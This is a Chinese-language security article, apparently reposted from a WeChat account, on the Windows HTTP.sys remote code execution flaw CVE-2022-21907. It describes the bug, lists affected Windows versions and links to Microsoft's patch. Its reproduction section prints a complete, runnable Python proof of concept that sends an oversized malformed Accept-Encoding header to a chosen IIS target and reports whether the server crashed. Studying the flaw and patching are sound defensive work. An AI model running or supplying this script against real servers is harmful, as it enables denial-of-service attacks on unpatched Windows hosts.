HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现

HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现
2022-1-25 09:30:0 Author: mp.weixin.qq.com(查看原文) 阅读量:54 收藏

文章来源：洛米唯熊

0x00 漏洞概述

HTTP协议堆栈中存在远程代码执行漏洞，由于HTTP协议栈(HTTP.sys)中的HTTP Trailer Support功能存在边界错误可导致缓冲区溢出。

未经身份验证的攻击者通过向Web服务器发送特制的HTTP数据包，触发缓冲区溢出，从而在目标系统上执行任意代码。该漏洞被微软提示为“可蠕虫化”，无需用户交互，便可通过网络进行自我传播。

CVSS评分为9.8

0x01 影响范围

Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 for ARM64-based SystemsWindows 11 for x64-based SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

0x02 漏洞复现

#!/usr/bin/env python3# -*- coding: utf-8 -*-# File name          : CVE-2022-21907_http.sys_crash.py# Author             : Podalirius (@podalirius_)# Date created       : 13 Jan 2022
import argparseimport datetimeimport requestsimport timeimport threading

def parseArgs():    parser = argparse.ArgumentParser(description="Description message")    parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')    return parser.parse_args()

def monitor_thread(target, dtime=5):    print('[>] Started monitoring of target server for the next %d seconds.' % dtime)    for k in range(dtime):        try:            r = requests.get(target, timeout=1)        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:            print("   [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))        else:            print("   [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))            time.sleep(1)

if __name__ == '__main__':    options = parseArgs()
    if not options.target.startswith('http://') and not options.target.startswith('https://'):        target = "http://" + options.target    else:        target = options.target
    payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
    # Starting monitoring thread    t = threading.Thread(target=monitor_thread, args=(target,))    t.start()    time.sleep(2)
    # Sending payload    print("   [+] Sending payload ...")    try:        r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:        t.join()        print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
    # Cleanup    t.join()

0x03 修复方案

官方已发布受影响版本的对应补丁，建议受影响的用户及时更新官方的安全补丁。链接如下：

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907

侵权请私聊公众号删文

微信公众号文章素材之分割线大全

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650532583&idx=2&sn=9b2b4d12294edbd120353835bd599343&chksm=83ba8f03b4cd06153144abc79e2add2d0622a86f57454b048c6c901b256d4a267236caca6bed#rd
如有侵权请联系:admin#unsafe.sh